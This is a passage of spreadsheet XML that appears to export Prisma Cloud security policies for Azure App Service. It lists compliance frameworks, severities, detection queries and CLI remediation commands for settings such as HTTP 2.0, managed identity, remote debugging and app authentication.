          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'properties.state equals Running and ((config.javaVersion exists and config.javaVersion does not equal 1.8 and config.javaVersion does not equal 11 and config.javaVersion does not equal 17) or (config.linuxFxVersion is not empty and config.linuxFxVersion contains JAVA and (config.linuxFxVersion contains 8 or config.linuxFxVersion contains 11 or config.linuxFxVersion contains 17) and config.linuxFxVersion does not contain 8-jre8 and config.linuxFxVersion does not contain 11-java11 and config.linuxFxVersion does not contain 17-java17) or (config.linuxFxVersion is not empty and config.linuxFxVersion contains JBOSSEAP and config.linuxFxVersion does not contain 7-java8 and config.linuxFxVersion does not contain 7-java11 and config.linuxFxVersion does not contain 7-java17) or (config.linuxFxVersion contains TOMCAT and config.linuxFxVersion does not end with 10.0-jre8 and config.linuxFxVersion does not end with 9.0-jre8 and config.linuxFxVersion does not end with 8.5-jre8 and config.linuxFxVersion does not end with 10.0-java11 and config.linuxFxVersion does not end with 9.0-java11 and config.linuxFxVersion does not end with 8.5-java11 and config.linuxFxVersion does not end with 10.0-java17 and config.linuxFxVersion does not end with 9.0-java17 and config.linuxFxVersion does not end with 8.5-java17))'</t>
        </is>
      </c>
      <c r="AA2189" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2189" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2189" t="inlineStr">
        <is>
          <t>PC-AZR-APP-411</t>
        </is>
      </c>
      <c r="AD2189" t="b">
        <v>1</v>
      </c>
      <c r="AE2189" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2189" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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89" t="inlineStr">
        <is>
          <t>1accd873-5ac3-4ff6-9729-b0464cb5cf12</t>
        </is>
      </c>
      <c r="AI2189" t="inlineStr">
        <is>
          <t>e447623b-b075-420c-b2e3-c044c87e796a</t>
        </is>
      </c>
      <c r="AJ2189" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2189" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" t="inlineStr"/>
      <c r="B2190" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2190" s="2" t="inlineStr"/>
      <c r="D2190" t="inlineStr"/>
      <c r="E2190" t="inlineStr"/>
      <c r="F2190" t="inlineStr"/>
      <c r="G2190" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2190" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2190" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable Azure Function [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L2190" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2190" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2190" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2190" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2190" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2190" t="inlineStr"/>
      <c r="R2190" t="inlineStr"/>
      <c r="S2190" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2190" t="b">
        <v>0</v>
      </c>
      <c r="U2190" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2190" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2190" t="inlineStr">
        <is>
          <t>This policy identifies Azure Functions that are publicly exposed and have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Azure Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java [CVE-2021-22118] vulnerability and public exposure reported for the Azure Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2190"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2190" t="inlineStr"/>
      <c r="Z2190" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('azure-app-service') and finding.name contains all ('(Disabled) Azure Function app configured with public network access') AND with : (Vuln WHERE id IN ('CVE-2021-22118'))</t>
        </is>
      </c>
      <c r="AA2190" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2190" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:00</t>
        </is>
      </c>
      <c r="AC2190" t="inlineStr"/>
      <c r="AD2190" t="b">
        <v>1</v>
      </c>
      <c r="AE2190" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2190" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>f2a803e0-b2af-4da6-9686-091c90c100cc</t>
        </is>
      </c>
      <c r="AI2190" t="inlineStr">
        <is>
          <t>7bd956ce-c45e-4daa-a7e1-4440277fac43</t>
        </is>
      </c>
      <c r="AJ2190" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2190" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, Azure Security Benchmark (v2), ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 1, GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, Copy of CIS v1.2.0 (Azure), Insurance Regulatory And Development Authority Of India, Azure Security Benchmark (v2), NIST SP 800-172, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], Azure Security Benchmark (v3), MTSBv2_Azure, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.1 (Azure), NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CIS v1.4.0 (Azure), CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, CIS v1.2.0 (Azure), NIST SP 800-171 Revision 2, CIS Controls v7.1, CIS v1.3.0 (Azure), CRI Profile v1.2.1, CIS v2.1.0 (Azure) Level 1, Copy of CIS Controls v8, ISO 27002:2022, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, CIS Controls v7.1, DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, ISO/IEC 27018:2019, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.5.0 (Azure) - Level 1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CRI Profile v1.2.1, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, testazure, PCI DSS v3.2.1, CRI Profile v2.0, Azure Security Benchmark (v3), Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, CIS Controls v8, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, NIST SP 800-172, CIS v1.3.1 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2191" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2191" s="2" t="inlineStr"/>
      <c r="D2191" t="inlineStr"/>
      <c r="E2191" t="inlineStr"/>
      <c r="F2191" t="inlineStr"/>
      <c r="G2191" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2191" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2191" t="inlineStr">
        <is>
          <t>Azure App Service Web app doesn't use HTTP 2.0</t>
        </is>
      </c>
      <c r="L2191" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2191" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2191" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2191" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2191" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2191" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2191" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2191" t="inlineStr">
        <is>
          <t>AppService</t>
        </is>
      </c>
      <c r="T2191" t="b">
        <v>1</v>
      </c>
      <c r="U2191" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2191" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2191" t="inlineStr">
        <is>
          <t>HTTP 2.0 has additional performance improvements on the head-of-line blocking problem of old HTTP version, header compression, and prioritization of requests. HTTP 2.0 no longer supports HTTP 1.1's chunked transfer encoding mechanism, as it provides its own, more efficient, mechanisms for data streaming.</t>
        </is>
      </c>
      <c r="X2191" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App
4. Under Setting section, Click on 'Configuration'
5. Under 'General Settings' tab, In 'Platform settings', Set 'HTTP version' to '2.0' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-8</t>
        </is>
      </c>
      <c r="Y2191" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/*' permission. Successful execution sets HTTP version to 2.0,
which has additional performance improvements on the head-of-line blocking problem of old HTTP version,
header compression,
and prioritization of requests.",
'impact': 'Sets latest HTTP version in Azure App Service',
'cliScriptTemplate': 'az webapp config set --resource-group $resourceGroup --name $resourceName --http20-enabled true'</t>
        </is>
      </c>
      <c r="Z2191" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = 'kind starts with app and config.http20Enabled equals false'
{"category":"Networking","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2191" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2191" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2191" t="inlineStr">
        <is>
          <t>PC-AZR-APP-410-CKV_AZURE_18</t>
        </is>
      </c>
      <c r="AD2191" t="b">
        <v>1</v>
      </c>
      <c r="AE2191" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2191" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>4f5c4a28-c3df-4bee-a980-621c794548ed</t>
        </is>
      </c>
      <c r="AI2191" t="inlineStr">
        <is>
          <t>54957a87-ae1f-4776-a656-7a274498b153</t>
        </is>
      </c>
      <c r="AJ2191" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2191" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27001:2022, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v4.0.12, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Australian Energy Sector Cyber Security Framework (AESCSF), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2192" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2192" s="2" t="inlineStr"/>
      <c r="D2192" t="inlineStr"/>
      <c r="E2192" t="inlineStr"/>
      <c r="F2192" t="inlineStr"/>
      <c r="G2192" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2192" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2192" t="inlineStr">
        <is>
          <t>Azure Function App doesn't have a Managed Service Identity</t>
        </is>
      </c>
      <c r="L2192" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2192" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2192" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2192" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2192" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2192" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2192" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2192" t="inlineStr"/>
      <c r="T2192" t="b">
        <v>1</v>
      </c>
      <c r="U2192" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2192" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2192" t="inlineStr">
        <is>
          <t>This policy identifies Azure Function App which doesn't have a Managed Service Identity. Managed service identity in Function App makes the app more secure by eliminating secrets from the app, such as credentials in the connection strings. When registering with Azure Active Directory in the app service, the app will connect to other Azure services securely without the need of username and passwords.</t>
        </is>
      </c>
      <c r="X2192" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Function App
3. Click on the reported Function App
4. Under Setting section, Click on 'Identity'
5. Configure either 'System-assigned' or 'User-assigned' managed identity based on your requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2192" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/Write' permission. Successful execution sets managed service identity in Azure Function App,
that makes the app more secure by eliminating secrets from the app,
such as credentials in the connection strings.",
'impact': 'Sets managed service identity in Azure Function App',
'cliScriptTemplate': 'az functionapp Identity assign --resource-group $resourceGroup --name $resourceName'</t>
        </is>
      </c>
      <c r="Z2192" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = properties.state equal ignore case "Running" AND kind contains "functionapp" AND kind does not contain "workflowapp" AND kind does not equal "app" AND (identity.type does not exist or identity.principalId is empty)</t>
        </is>
      </c>
      <c r="AA2192" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2192" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2192" t="inlineStr">
        <is>
          <t>PC-AZR-APP-678</t>
        </is>
      </c>
      <c r="AD2192" t="b">
        <v>1</v>
      </c>
      <c r="AE2192" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2192" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>ea2b2d97-1ea5-4f98-8f5c-16c978f1ced6</t>
        </is>
      </c>
      <c r="AI2192" t="inlineStr">
        <is>
          <t>0649ae20-3c76-4134-851f-70a7b65c03ec</t>
        </is>
      </c>
      <c r="AJ2192" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2192" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, Sarbanes Oxley Act (SOX), ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), MLPS 2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, TX-RAMP Level 1, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8, ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ITSG-33, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2193" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2193" s="2" t="inlineStr"/>
      <c r="D2193" t="inlineStr"/>
      <c r="E2193" t="inlineStr"/>
      <c r="F2193" t="inlineStr"/>
      <c r="G2193" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2193" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2193" t="inlineStr">
        <is>
          <t>Azure App Services Remote debugging is enabled</t>
        </is>
      </c>
      <c r="L2193" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2193" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2193" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2193" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2193" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2193" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2193" t="inlineStr">
        <is>
          <t>ISM-0487</t>
        </is>
      </c>
      <c r="S2193" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2193" t="b">
        <v>1</v>
      </c>
      <c r="U2193" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2193" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2193" t="inlineStr">
        <is>
          <t>This policy identifies Azure App Services which has Remote debugging enabled. Enabling Remote debugging feature opens up inbound ports on App Services. It is recommended to disabled Azure App Services Remote debugging.</t>
        </is>
      </c>
      <c r="X2193" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'App Services' from the left pane
3. Select the reported App Services
4. Go to 'Configurations' under 'Settings'
5. Click on 'General settings'
6. Select 'Off' for 'Remote debugging' under 'Debugging section
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services</t>
        </is>
      </c>
      <c r="Y2193" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/config/Write' permission. Successful execution will disable remote debugging on azure app service apps.",
'impact': 'Disables remote debugging on azure app service apps',
'cliScriptTemplate': 'az webapp config set --resource-group $resourceGroup --name $resourceName --remote-debugging-enabled false'</t>
        </is>
      </c>
      <c r="Z2193" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-app-service' AND json.rule = config.remoteDebuggingEnabled is true
{"category":"General","resourceTypes":["azurerm_app_service"]}</t>
        </is>
      </c>
      <c r="AA2193" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2193" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2193" t="inlineStr">
        <is>
          <t>PC-AZR-APP-569-CKV_AZURE_72</t>
        </is>
      </c>
      <c r="AD2193" t="b">
        <v>1</v>
      </c>
      <c r="AE2193" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2193" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>6fd5eaee-2e6d-419b-b380-2fa1a67feaf3</t>
        </is>
      </c>
      <c r="AI2193" t="inlineStr">
        <is>
          <t>1feba014-ed3b-46ed-8a7c-4c03ec1469b7</t>
        </is>
      </c>
      <c r="AJ2193" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2193" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, PCI DSS v4.0, NIST CSF, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 2, CIS Controls v8, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 2, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CIS v1.2.0 (Azure), NIST 800-53 Rev4, Copy of CIS Controls v8, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, CSA CCM v.4.0.6, ISO/IEC 27002:2013, TX-RAMP Level 1, PCI DSS v4.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.4.0 (Azure), Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, Copy of CIS v1.2.0 (Azure), ISO/IEC 27018:2019, CSA CCM v.4.0.6, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), CIS v1.1 (Azure), HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.6, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, testazure, DORA, ISO/IEC 27002:2013, CIS Controls v7.1, PCI DSS v4.0, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v3.2.1, CIS v2.1.0 (Azure) Level 2, kashan ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Azure Security Benchmark (v2), Azure Security Benchmark (v3), CIS Controls v7.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, CIS v2.0.0 (Azure) Level 2, APRA (CPS 234) Information Security, CIS v1.3.0 (Azure), PCI DSS v4.0, CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), SOC 2, MTSBv2_Azure, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27018:2019, ISO/IEC 27001:2022, CIS Controls v8.1, NIST SP 800-172, ISO/IEC 27001:2022, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, ITSG-33, PIPEDA, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CIS v1.3.1 (Azure), Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO 27002:2022, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B2194" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2194" s="2" t="inlineStr"/>
      <c r="D2194" t="inlineStr"/>
      <c r="E2194" t="inlineStr"/>
      <c r="F2194" t="inlineStr"/>
      <c r="G2194" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2194" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="K2194" t="inlineStr">
        <is>
          <t>Azure App Service Web app authentication is off</t>
        </is>
      </c>
      <c r="L2194" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2194" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2194" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2194" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2194" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2194" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2194" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S2194" t="inlineStr">
        <is>
          <t>Attack Path Rule,Identity Misconfiguration,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2194" t="b">
        <v>1</v>
      </c>
      <c r="U2194" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2194" t="inlineStr">
        <is>
          <t>azure-app-service</t>
        </is>
      </c>
      <c r="W2194" t="inlineStr">
        <is>
          <t>Azure App Service Authentication is a feature that can prevent anonymous HTTP requests from reaching the API app, or authenticate those that have tokens before they reach the API app. If an anonymous request is received from a browser, App Service will redirect to a logon page. To handle the logon process, a choice from a set of identity providers can be made, or a custom authentication mechanism can be implemented.</t>
        </is>
      </c>
      <c r="X2194" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to App Services
3. Click on the reported App
4. Under the Setting section, Click on 'Authentication / Authorization'
 a. In case the Identity Provider is not configured: https://learn.microsoft.com/en-gb/azure/app-service/overview-authentication-authorization#identity-providers 
 b. In case the identity Provider is configured and disabled:
  i. Edit Authentication Settings
  ii. Set 'App Service Authentication' to 'Enabled'
  iii. Choose other parameters as per your requirement and Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2</t>
        </is>
      </c>
      <c r="Y2194" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Web/sites/app_name/config/authsettings/*' permission. Successful execution will enable app service authentication,
that can prevent anonymous HTTP requests from reaching the API app,
or authenticate those that have tokens before they reach the API app.",
'impact': 'Sets on App Service Authentication in Azure App Service',
